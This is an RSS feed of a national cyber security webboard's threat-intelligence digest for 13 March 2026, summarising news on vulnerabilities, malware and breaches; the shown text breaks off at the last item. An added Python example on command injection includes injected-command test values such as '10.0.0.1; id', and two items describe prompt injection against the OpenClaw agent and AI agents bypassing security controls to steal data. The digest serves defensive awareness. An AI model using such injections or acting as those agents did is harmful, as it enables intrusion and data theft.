<?xml version="1.0" encoding="UTF-8"?><rss xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" version="2.0"><channel><title><![CDATA[Cyber Security News]]></title><description><![CDATA[Discussion of news about cyber threats across the country, and general announcements about cyber security.]]></description><link>https://webboard-nsoc.ncsa.or.th/category/12</link><generator>RSS for Node</generator><lastBuildDate>Sat, 14 Mar 2026 22:33:53 GMT</lastBuildDate><atom:link href="https://webboard-nsoc.ncsa.or.th/category/12.rss" rel="self" type="application/rss+xml"/><pubDate>Fri, 13 Mar 2026 09:02:49 GMT</pubDate><ttl>60</ttl><item><title><![CDATA[Cyber Threat Intelligence 13 March 2026]]></title><description><![CDATA[<p dir="auto"><strong>Industrial Sector</strong></p>
<ul>
<li><strong>Stop Fixing OT Security With IT Thinking</strong><br />
"In this Help Net Security interview, Ejona Preçi, Group CISO at Lindal Group, discusses the specific cybersecurity challenges in manufacturing environments. The conversation covers why standard IT security practices break down on shop floors, where PLCs and decade-old firmware were never designed to be networked. She explains how nation-state actors quietly settle into industrial networks, using stale accounts and compromised workstations to map environments without triggering alarms. She addresses patch management in OT, where production lines cannot simply be taken offline, and describes how security teams use compensating controls to manage risk without breaking operations."<br />
<a href="https://www.helpnetsecurity.com/2026/03/12/ejona-preci-lindal-group-ot-cybersecurity-manufacturing/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.helpnetsecurity.com/2026/03/12/ejona-preci-lindal-group-ot-cybersecurity-manufacturing/</a></li>
</ul>
<p dir="auto"><strong>Vulnerabilities</strong></p>
<ul>
<li><strong>Veeam Warns Of Critical Flaws Exposing Backup Servers To RCE Attacks</strong><br />
"Data protection company Veeam Software has patched multiple flaws in its Backup &amp; Replication solution, including four critical remote code execution (RCE) vulnerabilities. VBR is enterprise data backup and recovery software that helps IT administrators to create copies of critical data for quick restoration following cyberattacks and hardware failures. Three RCE security flaws patched today (tracked as CVE-2026-21666, CVE-2026-21667, and CVE-2026-21669) allow low-privileged domain users to execute remote code on vulnerable backup servers in low-complexity attacks."<br />
<a href="https://www.bleepingcomputer.com/news/security/veeam-warns-of-critical-flaws-exposing-backup-servers-to-rce-attacks/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.bleepingcomputer.com/news/security/veeam-warns-of-critical-flaws-exposing-backup-servers-to-rce-attacks/</a><br />
<a href="https://www.veeam.com/kb4830" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.veeam.com/kb4830</a></li>
<li><strong>A Major Security Flaw Could Affect 1 In 4 Android Phones - Here's How To Check Yours</strong><br />
"A hardware security flaw found in many Android phones allowed white hat hackers to gain entry in under a minute, according to a new report. From there, they accessed sensitive user data, including messages and crypto wallet seed phrases. The flaw can be exploited by simply connecting an affected Android device to a laptop via a USB cable, according to a Wednesday report published by Donjon, the research division of crypto security hardware company Ledger. The phone's PIN could then be automatically brute-forced, its storage decrypted, and seed phrases from popular crypto wallets like Kraken Wallet and Phantom extracted."<br />
<a href="https://www.zdnet.com/article/security-flaw-affects-1-in-4-android-phones-how-to-check-yours/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.zdnet.com/article/security-flaw-affects-1-in-4-android-phones-how-to-check-yours/</a><br />
<a href="https://www.malwarebytes.com/blog/news/2026/03/this-android-vulnerability-can-break-your-lock-screen-in-under-60-seconds" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.malwarebytes.com/blog/news/2026/03/this-android-vulnerability-can-break-your-lock-screen-in-under-60-seconds</a></li>
<li><strong>Splunk, Zoom Patch Severe Vulnerabilities</strong><br />
"Splunk and Zoom this week announced security updates that resolve multiple critical- and high-severity vulnerabilities across their product portfolios. Zoom has addressed a critical-severity flaw in Workplace for Windows that could allow unauthenticated, remote attackers to elevate their privileges over the network. The issue impacts the Mail feature of the product and was addressed in Workplace for Windows version 6.6.0 and Workplace VDI Client for Windows versions 6.4.17, 6.5.15, and 6.6.10."<br />
<a href="https://www.securityweek.com/splunk-zoom-patch-severe-vulnerabilities/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.securityweek.com/splunk-zoom-patch-severe-vulnerabilities/</a></li>
<li><strong>Cisco Patches High-Severity IOS XR Vulnerabilities</strong><br />
"Cisco on Wednesday published its semiannual IOS XR software security advisory bundle, which includes three advisories detailing four high-severity vulnerabilities. The most severe of these issues are CVE-2026-20040 and CVE-2026-20046 (CVSS score of 8.8), two bugs that could be exploited to execute arbitrary commands as root or gain administrative control of a device. CVE-2026-20040 exists because user arguments passed to specific CLI commands are not sufficiently validated, allowing a low-privileged attacker to supply crafted commands at the prompt."<br />
<a href="https://www.securityweek.com/cisco-patches-high-severity-ios-xr-vulnerabilities-2/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.securityweek.com/cisco-patches-high-severity-ios-xr-vulnerabilities-2/</a><br />
<a href="https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxr-privesc-bF8D5U4W" target="_blank" rel="noopener noreferrer nofollow ugc">https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxr-privesc-bF8D5U4W</a></li>
<li><strong>Apple Patches Older iPhones And iPads Against Coruna Exploits</strong><br />
"Apple has released security updates to patch older iPhones and iPads against a set of vulnerabilities targeted in cyberespionage and crypto-theft attacks using the Coruna exploit kit. Some of these security flaws have already been addressed in earlier updates for newer iOS device models, starting in September 2023. "This fix is associated with the Coruna exploit," Apple said in security advisories released on Wednesday. "This update brings that fix to devices that cannot update to the latest iOS version.""<br />
<a href="https://www.bleepingcomputer.com/news/apple/apple-patches-older-iphones-and-ipads-against-coruna-exploits/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.bleepingcomputer.com/news/apple/apple-patches-older-iphones-and-ipads-against-coruna-exploits/</a><br />
<a href="https://thehackernews.com/2026/03/apple-issues-security-updates-for-older.html" target="_blank" rel="noopener noreferrer nofollow ugc">https://thehackernews.com/2026/03/apple-issues-security-updates-for-older.html</a><br />
<a href="https://www.malwarebytes.com/blog/news/2026/03/apple-patches-coruna-exploit-kit-flaws-for-older-ios-versions" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.malwarebytes.com/blog/news/2026/03/apple-patches-coruna-exploit-kit-flaws-for-older-ios-versions</a><br />
<a href="https://securityaffairs.com/189362/security/apple-issues-emergency-fixes-for-coruna-flaws-in-older-ios-versions.html" target="_blank" rel="noopener noreferrer nofollow ugc">https://securityaffairs.com/189362/security/apple-issues-emergency-fixes-for-coruna-flaws-in-older-ios-versions.html</a><br />
<a href="https://www.securityweek.com/apple-updates-older-ios-versions-to-patch-coruna-exploits/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.securityweek.com/apple-updates-older-ios-versions-to-patch-coruna-exploits/</a></li>
<li><strong>Microsoft Authenticator Could Leak Login Codes—Update Your App Now</strong><br />
"A vulnerability in Microsoft Authenticator for both iOS and Android (CVE-2026-26123) could leak your one-time sign-in codes or authentication deep links to a malicious app on the same device. Deep links are predefined URIs (Uniform Resource Identifiers) that allow direct access to an activity in a web or mobile application when clicked. In simple terms, they are specifically constructed links used to open an app and complete actions like signing in."<br />
<a href="https://www.malwarebytes.com/blog/news/2026/03/microsoft-authenticator-could-leak-login-codes-update-your-app-now" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.malwarebytes.com/blog/news/2026/03/microsoft-authenticator-could-leak-login-codes-update-your-app-now</a></li>
<li><strong>China’s CERT Warns OpenClaw Can Inflict Nasty Wounds</strong><br />
"China’s National Computer Network Emergency Response Technical Team has warned locals that the OpenClaw agentic AI tool poses significant security risks. In a Tuesday post to its WeChat account, the CERT warned that OpenClaw has “extremely weak default security configuration” and must therefore be handled with extreme care. The CERT is worried that attackers can target the tool by embedding malicious instructions in web pages, and that poisoned plugins for the agentic tool can put users at risk. China’s cyber-advisors also point out that OpenClaw has already disclosed several severe vulnerabilities that can result in credential theft and therefore enable serious attacks."<br />
<a href="https://www.theregister.com/2026/03/12/china_cert_openclaw_security_warning/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.theregister.com/2026/03/12/china_cert_openclaw_security_warning/</a></li>
</ul>
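<p dir="auto">The Cisco IOS XR item above attributes CVE-2026-20040 to user arguments passed to CLI commands that are not sufficiently validated before they reach the underlying command. The block below is an added example, not code from Cisco, from IOS XR, or from any of the linked articles; it illustrates that bug class generically in Python: a wrapper that splices an operator-supplied target into a shell command line, beside a hardened version that allowlists the argument and passes it as its own argv element with no shell. The <code>ping</code> wrapper, the validation rules and the sample inputs are this example's own assumptions and say nothing about how the IOS XR flaw itself is triggered.</p>

```python
"""Command injection via an unvalidated CLI argument, and the fix.

Added illustration of the bug class, not code from Cisco or IOS XR. The
'ping' wrapper, the allowlist rules and the sample inputs are constructed
for this example.
"""
import ipaddress
import re
import subprocess

# Characters a POSIX shell interprets; any of these in a spliced argument is a red flag.
SHELL_METACHARS = set(";|&$`<>(){}\n\r\"'\\*?[]~!#")

# RFC 1123 hostname: dot-separated labels of letters, digits and hyphens,
# 1-63 chars each, no leading/trailing hyphen, at most 253 chars in total.
HOSTNAME_RE = re.compile(
    r"(?=.{1,253}\Z)(?:[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?\.)*"
    r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
)


def shell_metachars_in(arg):
    """Sorted list of shell metacharacters present in arg (empty if none)."""
    return sorted(set(arg) & SHELL_METACHARS)


def build_command_unsafe(target):
    """VULNERABLE pattern: the argument is concatenated into a command string.
    Run with shell=True, 'ping -c 1 10.0.0.1; id' executes ping and then id."""
    return f"ping -c 1 {target}"


def validate_target(target):
    """Allowlist: accept an IPv4/IPv6 literal or an RFC 1123 hostname, else raise.
    A leading hyphen never passes, which also blocks option injection ('--help')."""
    try:
        ipaddress.ip_address(target)
        return target
    except ValueError:
        pass
    if HOSTNAME_RE.fullmatch(target):
        return target
    raise ValueError(f"rejected target argument: {target!r}")


def build_command_safe(target):
    """HARDENED: the validated argument is a single argv element and no shell is
    involved, so metacharacters are never interpreted as command syntax."""
    return ["ping", "-c", "1", validate_target(target)]


def run_ping(target):
    """Execute the hardened form (shell=False is subprocess's default)."""
    return subprocess.run(build_command_safe(target), capture_output=True, text=True)


if __name__ == "__main__":
    for candidate in ["10.0.0.1", "router-1.example.net", "10.0.0.1; id", "$(id)", "--help"]:
        try:
            print("accepted:", build_command_safe(candidate))
        except ValueError as exc:
            print("rejected:", exc, "| shell metachars:", shell_metachars_in(candidate))
```

<p dir="auto">Both controls matter on their own: the argv form stops the shell from ever seeing <code>;</code> or <code>$( )</code>, and the allowlist stops values such as <code>--help</code> from being read by the invoked program as options. Any management CLI that hands operator input to an underlying command should do both, and the privilege the command runs with (root, in the advisory's description) is what turns the missing check into a full compromise.</p>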
<p dir="auto"><strong>Malware</strong></p>
<ul>
<li><strong>A Slopoly Start To AI-Enhanced Ransomware Attacks</strong><br />
"In early 2026, IBM X-Force discovered a likely AI-generated novel malware which we are dubbing “Slopoly,” used during a ransomware attack. The operators are part of a group tracked as Hive0163, whose main objective is extortion through large-scale data exfiltration and ransomware. Evidence of AI adoption among high-profile cybercrime groups signals the start of a fundamental shift of dynamics within the threat landscape. Although still relatively unspectacular, AI-generated malware such as Slopoly shows how easily threat actors can weaponize AI to develop new malware frameworks in a fraction of the time it used to take."<br />
<a href="https://www.ibm.com/think/x-force/slopoly-start-ai-enhanced-ransomware-attacks" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.ibm.com/think/x-force/slopoly-start-ai-enhanced-ransomware-attacks</a><br />
<a href="https://www.bleepingcomputer.com/news/security/ai-generated-slopoly-malware-used-in-interlock-ransomware-attack/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.bleepingcomputer.com/news/security/ai-generated-slopoly-malware-used-in-interlock-ransomware-attack/</a><br />
<a href="https://thehackernews.com/2026/03/hive0163-uses-ai-assisted-slopoly.html" target="_blank" rel="noopener noreferrer nofollow ugc">https://thehackernews.com/2026/03/hive0163-uses-ai-assisted-slopoly.html</a></li>
<li><strong>Cyber Android RAT: Inside The Latest MaaS Being Sold On Underground Forums</strong><br />
"The market for Android malware-as-a-service has grown dramatically in recent years, lowering the technical barrier for cybercriminals who want to surveil, defraud, or steal from mobile device users. Where sophisticated attacks once required custom development, today’s threat landscape is shaped by polished, commercially packaged tools sold openly to anyone willing to pay. Certo’s research team has identified a new and particularly capable entry into this market: a full-featured Android Remote Access Trojan (RAT) advertised on clear-web hacking forums under the name Cyber Android RAT, backed by a command-and-control platform called Cyber Nebula Core."<br />
<a href="https://www.certosoftware.com/insights/cyber-android-rat-inside-the-latest-maas-being-sold-on-underground-forums/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.certosoftware.com/insights/cyber-android-rat-inside-the-latest-maas-being-sold-on-underground-forums/</a><br />
<a href="https://www.bankinfosecurity.com/sophisticated-surveillance-rat-marketed-for-global-buyers-a-31005" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.bankinfosecurity.com/sophisticated-surveillance-rat-marketed-for-global-buyers-a-31005</a></li>
<li><strong>Inside The Tehran-Linked 'Faketivist' Hacking Group Handala</strong><br />
"An Iranian hacking group that took credit for hacking a medical device manufacturer and a payment processing device maker has a history of wiper attacks, hack-and-leak campaigns and advancing Tehran's agenda through psychological operations. Going by the moniker "Handala," the group appears to be run out of Iran's Ministry of Intelligence, according to cybersecurity threat intel sources who track it under a variety of names, including Banished Kitten, Storm-0842 and Void Manticore."<br />
<a href="https://www.bankinfosecurity.com/inside-tehran-linked-faketivist-hacking-group-handala-a-31001" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.bankinfosecurity.com/inside-tehran-linked-faketivist-hacking-group-handala-a-31001</a></li>
<li><strong>Payment Giant Verifone Disputes Iranian Hacking Group Hit</strong><br />
"A self-proclaimed hacktivist group widely suspected of being a front for Iranian intelligence claimed Wednesday to have hacked New York City-based payment device maker Verifone, saying it disrupted the organization's Israeli office and stole data. Verifone disputed the assertion. "Verifone has found no evidence of any incident related to this claim and has no service disruption to our clients," it said in a statement. The hacking claim comes from Handala, a group that cybersecurity experts say appears to be run by Iran's Ministry of Intelligence, in part to execute pro-Tehran psychological operations."<br />
<a href="https://www.bankinfosecurity.com/payment-giant-verifone-disputes-iranian-hacking-group-hit-a-30995" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.bankinfosecurity.com/payment-giant-verifone-disputes-iranian-hacking-group-hit-a-30995</a></li>
<li><strong>Iranian MOIS Actors &amp; The Cyber Crime Connection</strong><br />
"For years, Iranian intelligence services have operated through deniable criminal intermediaries in the physical world. A similar pattern is now becoming visible in cyber space, where state objectives are increasingly pursued through criminal tools, services, and operational models. Notably, this dynamic appears with growing frequency in activity associated with actors linked to the Ministry of Intelligence and Security (MOIS). For a long time, Iranian actors sought to mask state activity behind the appearance of ordinary cyber crime, most often by posing as ransomware operators. The trend we are seeing now goes beyond imitation. Rather than simply adopting criminal and hacktivist personas to complicate attribution, some Iranian actors appear to be associating with the cyber criminal ecosystem itself, leveraging its malware, infrastructure, and affiliate-style mechanisms."<br />
<a href="https://research.checkpoint.com/2026/iranian-mois-actors-the-cyber-crime-connection/" target="_blank" rel="noopener noreferrer nofollow ugc">https://research.checkpoint.com/2026/iranian-mois-actors-the-cyber-crime-connection/</a><br />
<a href="https://www.darkreading.com/threat-intelligence/iran-mois-criminals-cyberattacks" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.darkreading.com/threat-intelligence/iran-mois-criminals-cyberattacks</a></li>
<li><strong>SecuritySnack - CloudFlare Anti-Security For Phishing</strong><br />
"Service platforms that provide protection and content delivery, like CloudFlare, have become a go-to for many web service hosts—including some malicious actors. These platforms offer inherent benefits like obfuscation, anti-bot, and anti-scanner tools. While excellent for defending legitimate customers, these very features can inadvertently shield malicious sites from proactive identification by security professionals and automated scanning services. This creates a challenging dynamic in the industry where a service provider's role in protecting its customer base competes with the broader community's need for effective security scanning. This report details a recent Microsoft 365 credential harvesting campaign that leverages this dynamic to delay detection and risk profiling."<br />
<a href="https://dti.domaintools.com/securitysnacks/securitysnack-cloudflare-anti-security-for-phishing" target="_blank" rel="noopener noreferrer nofollow ugc">https://dti.domaintools.com/securitysnacks/securitysnack-cloudflare-anti-security-for-phishing</a><br />
<a href="https://hackread.com/hackers-cloudflare-human-check-microsoft-365-phishing/" target="_blank" rel="noopener noreferrer nofollow ugc">https://hackread.com/hackers-cloudflare-human-check-microsoft-365-phishing/</a></li>
<li><strong>PixRevolution: The Agent-Operated Android Trojan Hijacking Brazil’s PIX Payments In Real Time</strong><br />
"In 2020, the Central Bank of Brazil implemented an instant payment system called PIX that significantly reformed the local payment landscape, with over 76% of the population utilizing it for immediate transfers via smartphones. The zLabs team has identified a novel Android banking trojan specifically targeting this system and implicitly targeting most Brazilian financial institutions. This new strain of malware operates stealthily within the device until the moment the victim initiates a PIX transfer. The user inputs the desired amount, enters the payee’s PIX key, and selects the send option. A familiar loading indicator, “Aguarde…” (please wait), is displayed. Subsequently, the screen confirms the transfer's completion; however, the funds are not routed to the intended payee. Instead, they are diverted to a criminal entity that has been monitoring the victim's screen in real time."<br />
<a href="https://zimperium.com/blog/pixrevolution-the-agent-operated-android-trojan-hijacking-brazils-pix-payments-in-real-time" target="_blank" rel="noopener noreferrer nofollow ugc">https://zimperium.com/blog/pixrevolution-the-agent-operated-android-trojan-hijacking-brazils-pix-payments-in-real-time</a><br />
<a href="https://thehackernews.com/2026/03/six-android-malware-families-target-pix.html" target="_blank" rel="noopener noreferrer nofollow ugc">https://thehackernews.com/2026/03/six-android-malware-families-target-pix.html</a><br />
<a href="https://hackread.com/pixrevolution-malware-steals-brazil-pix-transfers/" target="_blank" rel="noopener noreferrer nofollow ugc">https://hackread.com/pixrevolution-malware-steals-brazil-pix-transfers/</a><br />
<a href="https://www.infosecurity-magazine.com/news/pixrevolution-malware-brazils-pix/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.infosecurity-magazine.com/news/pixrevolution-malware-brazils-pix/</a></li>
<li><strong>China-Nexus Threat Actor Targets Persian Gulf Region With PlugX</strong><br />
"On March 1, 2026, ThreatLabz observed new activity from a China-nexus threat actor targeting countries in the Persian Gulf region. The activity took place within the first 24 hours of the renewed conflict in the Middle East. The threat actor quickly weaponized the theme of the conflict, using an Arabic-language document lure depicting missile attacks for social engineering. The campaign used a multi-stage attack chain that ultimately deployed a PlugX backdoor variant. Based on the tools, techniques, and procedures (TTPs) observed, ThreatLabz attributes this activity to a China-nexus threat actor with high confidence, and assesses with medium confidence that it may be linked to Mustang Panda."<br />
<a href="https://www.zscaler.com/blogs/security-research/china-nexus-threat-actor-targets-persian-gulf-region-plugx" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.zscaler.com/blogs/security-research/china-nexus-threat-actor-targets-persian-gulf-region-plugx</a></li>
<li><strong>How One Infostealer Infection Solved a Global Supply Chain Mystery And Unmasked DPRK Spies In U.S. Crypto</strong><br />
"The global cybersecurity community has spent the past year unraveling the catastrophic Polyfill.io supply chain attack, an event that compromised over 100,000 websites globally. Until now, researchers could only attribute the attack to a shadowy Chinese entity named “Funnull” and its ties to transnational organized crime. The missing link was definitive attribution. That link has just been found. An exhaustive, forensic-level analysis of browsing history, credential dumps, and operational telemetry recovered from a compromised endpoint by Hudson Rock definitively links the Polyfill.io operator to state-sponsored cyber activities aligned with the Democratic People’s Republic of Korea (DPRK)."<br />
<a href="https://www.infostealers.com/article/how-one-infostealer-infection-solved-a-global-supply-chain-mystery-and-unmasked-dprk-spies-in-u-s-crypto/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.infostealers.com/article/how-one-infostealer-infection-solved-a-global-supply-chain-mystery-and-unmasked-dprk-spies-in-u-s-crypto/</a><br />
<a href="https://www.securityweek.com/polyfill-supply-chain-attack-impacting-100k-sites-linked-to-north-korea/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.securityweek.com/polyfill-supply-chain-attack-impacting-100k-sites-linked-to-north-korea/</a></li>
<li><strong>VENON: The First Brazilian Banker RAT In Rust</strong><br />
"In February 2026, the ZenoX threat intelligence team identified an unknown malware family during hunting activity, internally classified as VENON due to references in the code (spelled with an N). The sample was initially flagged for behavior consistent with Latin American banking trojans, particularly the use of banking overlays and active window monitoring, characteristics present in established families such as Grandoreiro and Mekotio. The fundamental difference emerged during static analysis: unlike all known families in the Latin American ecosystem, VENON does not contain a single line of Delphi code. The binary is compiled entirely in Rust, with 88 external dependencies identified from Crates."<br />
<a href="https://zenox.ai/en/venon-the-first-brazilian-banker-rat-in-rust/" target="_blank" rel="noopener noreferrer nofollow ugc">https://zenox.ai/en/venon-the-first-brazilian-banker-rat-in-rust/</a><br />
<a href="https://thehackernews.com/2026/03/rust-based-venon-malware-targets-33.html" target="_blank" rel="noopener noreferrer nofollow ugc">https://thehackernews.com/2026/03/rust-based-venon-malware-targets-33.html</a></li>
<li><strong>Rogue AI Agents Can Work Together To Hack Systems And Steal Secrets</strong><br />
"AI agents work together to bypass security controls and stealthily steal sensitive data from within the enterprise systems in which they operate, according to tests carried out by frontier security lab Irregular. Although Irregular used some aggressive prompts that included urgent language to instruct agents to carry out assigned tasks, its experiments did not use any adversarial prompts that referenced security, hacking, or exploitation. All of the prompts and agents' responses are detailed in a Thursday report [PDF]."<br />
<a href="https://www.theregister.com/2026/03/12/rogue_ai_agents_worked_together/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.theregister.com/2026/03/12/rogue_ai_agents_worked_together/</a><br />
<a href="https://irregular-public-docs.s3.eu-north-1.amazonaws.com/emergent_cyber_behavior_when_ai_agents_become_offensive_threat_actors.pdf" target="_blank" rel="noopener noreferrer nofollow ugc">https://irregular-public-docs.s3.eu-north-1.amazonaws.com/emergent_cyber_behavior_when_ai_agents_become_offensive_threat_actors.pdf</a></li>
<li><strong>Insights: Increased Risk Of Wiper Attacks</strong><br />
"Unit 42 is tracking an increased risk of wiper attacks related to the conflict with Iran, including multiple related incidents impacting organizations in Israel and the US. For the latest intelligence on cyberattacks associated with this conflict, review our Threat Brief: March 2026 Escalation of Cyber Risk Related to Iran. The primary vector for recent destructive operations from the Handala Hack group (aka Void Manticore, COBALT MYSTIQUE and Storm-1084/Storm-0842) reportedly involves the exploitation of identity through phishing and administrative access through Microsoft Intune. Handala Hack first emerged in late 2023. Despite initial hacktivist-aligned messaging, the group is currently assessed by the threat intelligence community to be a state-directed front for Iran’s Ministry of Intelligence and Security (MOIS)."<br />
<a href="https://unit42.paloaltonetworks.com/handala-hack-wiper-attacks/" target="_blank" rel="noopener noreferrer nofollow ugc">https://unit42.paloaltonetworks.com/handala-hack-wiper-attacks/</a></li>
<li><strong>Suspected China-Based Espionage Operation Against Military Targets In Southeast Asia</strong><br />
"We identified a cluster of malicious activity targeting Southeast Asian military organizations, suspected with moderate confidence to be operating out of China. We designate this cluster as CL-STA-1087, with STA representing our assessment that the activity is conducted by state-sponsored actors. We traced this activity back to at least 2020. The activity demonstrated strategic operational patience and a focus on highly targeted intelligence collection, rather than bulk data theft. The attackers behind this cluster actively searched for and collected highly specific files concerning military capabilities, organizational structures and collaborative efforts with Western armed forces."<br />
<a href="https://origin-unit42.paloaltonetworks.com/espionage-campaign-against-military-targets/" target="_blank" rel="noopener noreferrer nofollow ugc">https://origin-unit42.paloaltonetworks.com/espionage-campaign-against-military-targets/</a></li>
</ul>
<p dir="auto"><strong>Breaches/Hacks/Leaks</strong></p>
<ul>
<li><strong>Canadian Retail Giant Loblaw Notifies Customers Of Data Breach</strong><br />
"Loblaw Companies Limited (Loblaw), the largest food and pharmacy retailer in Canada, announced that hackers breached a portion of its IT network and accessed basic customer information. The retailer has a nationwide network of 2,500 stores (franchise supermarkets, pharmacies, banking kiosks, and apparel shops) and plans to expand with 70 new ones this year as part of a five-year plan to invest $10 billion by 2030. The company employs 220,000 people and has an annual revenue of $45 billion. Its best-known commercial banners and brands are Loblaws, Real Canadian Superstore, No Frills, Maxi, President’s Choice, PC Optimum, and Joe Fresh."<br />
<a href="https://www.bleepingcomputer.com/news/security/canadian-retail-giant-loblaw-notifies-customers-of-data-breach/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.bleepingcomputer.com/news/security/canadian-retail-giant-loblaw-notifies-customers-of-data-breach/</a></li>
<li><strong>England Hockey Investigating Ransomware Data Breach</strong><br />
"England Hockey, the governing body for field hockey in England, is investigating a potential data breach after the AiLock ransomware gang listed it as a victim on its data leak site. The threat actor allegedly stole 129GB of data from the organization’s systems and announced that it will soon publish the files, unless a ransom is paid. England Hockey is aware of the threat actor’s claims and has prioritized an inquiry that involves both internal teams and external experts to determine what happened."<br />
<a href="https://www.bleepingcomputer.com/news/security/england-hockey-investigating-ransomware-data-breach/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.bleepingcomputer.com/news/security/england-hockey-investigating-ransomware-data-breach/</a></li>
<li><strong>Telus Digital Confirms Breach After Hacker Claims 1 Petabyte Data Theft</strong><br />
"Canadian business process outsourcing giant Telus Digital has confirmed it suffered a security incident after threat actors claimed to have stolen nearly 1 petabyte of data from the company in a multi-month breach. Telus Digital is the digital services and business process outsourcing (BPO) arm of Canadian telecommunications provider Telus, providing customer support, content moderation, AI data services, and other outsourced operational services to companies worldwide."<br />
<a href="https://www.bleepingcomputer.com/news/security/telus-digital-confirms-breach-after-hacker-claims-1-petabyte-data-theft/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.bleepingcomputer.com/news/security/telus-digital-confirms-breach-after-hacker-claims-1-petabyte-data-theft/</a></li>
</ul>
<p dir="auto"><strong>General News</strong></p>
<ul>
<li><strong>Authorities Dismantle Global Malicious Proxy Service That Deployed Malware And Defrauded Thousands Of U.S. Persons, Businesses, And Financial Institutions Of Millions Of Dollars In Losses</strong><br />
"Yesterday a court-authorized international law enforcement operation led by the U.S. Justice Department disrupted SocksEscort, a residential proxy network used to exploit thousands of residential routers worldwide and commit large-scale fraud. The U.S. government executed seizure warrants against a few dozen U.S.-registered internet domains allegedly engaged in the cyber-enabled criminal activity, U.S. Attorney Eric Grant announced. According to court documents, SocksEscort infected home and small business internet routers with malware. The malware allowed SocksEscort to direct internet traffic through the infected routers. SocksEscort sold this access to its customers."<br />
<a href="https://www.justice.gov/usao-edca/pr/authorities-dismantle-global-malicious-proxy-service-deployed-malware-and-defrauded" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.justice.gov/usao-edca/pr/authorities-dismantle-global-malicious-proxy-service-deployed-malware-and-defrauded</a><br />
<a href="https://www.bleepingcomputer.com/news/security/us-disrupts-socksescort-proxy-network-powered-by-linux-malware/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.bleepingcomputer.com/news/security/us-disrupts-socksescort-proxy-network-powered-by-linux-malware/</a><br />
<a href="https://therecord.media/us-europol-disrupt-socksescort-network" target="_blank" rel="noopener noreferrer nofollow ugc">https://therecord.media/us-europol-disrupt-socksescort-network</a><br />
<a href="https://cyberscoop.com/socksescort-proxy-network-botnet-takedown/" target="_blank" rel="noopener noreferrer nofollow ugc">https://cyberscoop.com/socksescort-proxy-network-botnet-takedown/</a><br />
<a href="https://hackread.com/feds-dismantle-socksescort-proxy-network-fraud/" target="_blank" rel="noopener noreferrer nofollow ugc">https://hackread.com/feds-dismantle-socksescort-proxy-network-fraud/</a><br />
<a href="https://www.theregister.com/2026/03/12/socksescort_fraud_proxy_taken_down_fbi/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.theregister.com/2026/03/12/socksescort_fraud_proxy_taken_down_fbi/</a></li>
<li><strong>US Charges Another Ransomware Negotiator Linked To BlackCat Attacks</strong><br />
"The U.S. Department of Justice charged another former DigitalMint employee for his involvement in an insider scheme in which ransomware negotiators secretly partnered with the BlackCat (ALPHV) ransomware operation. Angelo Martino has been charged with one count of conspiracy to interfere with interstate commerce by extortion after surrendering to the U.S. Marshals on March 10."<br />
<a href="https://www.bleepingcomputer.com/news/security/us-charges-another-ransomware-negotiator-linked-to-blackcat-attacks/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.bleepingcomputer.com/news/security/us-charges-another-ransomware-negotiator-linked-to-blackcat-attacks/</a></li>
<li><strong>ENISA Technical Advisory For Secure Use Of Package Managers</strong><br />
"This document focuses on how developers can securely use package managers as part of their software development life cycle. In particular, this document, outlines common risks involved in the use of third-party packages, presents secure practices for selecting, integrating, and monitoring packages and describes approaches for addressing vulnerabilities found in dependencies."<br />
<a href="https://www.enisa.europa.eu/publications/enisa-technical-advisory-for-secure-use-of-package-managers" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.enisa.europa.eu/publications/enisa-technical-advisory-for-secure-use-of-package-managers</a><br />
<a href="https://www.enisa.europa.eu/sites/default/files/2026-03/ENISA%20Technical%20Advisory%20-%20Package_Managers_Final.pdf" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.enisa.europa.eu/sites/default/files/2026-03/ENISA Technical Advisory - Package_Managers_Final.pdf</a><br />
<a href="https://securityaffairs.com/189333/security/enisa-technical-advisory-on-secure-package-managers-essential-devsecops-guidance.html" target="_blank" rel="noopener noreferrer nofollow ugc">https://securityaffairs.com/189333/security/enisa-technical-advisory-on-secure-package-managers-essential-devsecops-guidance.html</a><br />
<a href="https://www.helpnetsecurity.com/2026/03/12/enisa-package-manager-security-technical-advisory/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.helpnetsecurity.com/2026/03/12/enisa-package-manager-security-technical-advisory/</a></li>
<li><strong>Wireless Vulnerabilities Are Doubling Every Few Years</strong><br />
